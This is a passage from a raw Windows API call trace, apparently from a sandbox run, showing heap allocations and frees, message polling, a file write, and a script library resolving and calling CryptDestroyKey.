HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f1d350 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0259.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0259.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f189b0 | out: hHeap=0x970000) returned 1 [0259.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0259.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0259.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.566] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0259.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0259.566] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0259.566] WriteFile (in: hFile=0x2a0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0x4998, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0x4998, lpOverlapped=0x0) returned 1 [0259.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0259.568] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.568] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0259.568] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0259.568] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0259.569] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0259.569] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0259.569] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0259.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0259.569] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0259.569] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0259.570] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0259.570] CryptDestroyKey (hKey=0xa87110) returned 1 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.570] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0259.570] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0259.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3be0048 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0259.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0259.571] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0259.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0259.571] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.572] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0259.572] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0259.572] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51af0 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0259.572] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0259.572] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0259.572] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.573] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e519b8 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a60 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a78 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0259.574] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0259.574] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0259.574] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0259.574] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0259.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0259.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0259.575] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0259.575] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0259.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0259.575] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0259.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0259.576] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0259.576] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0259.576] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 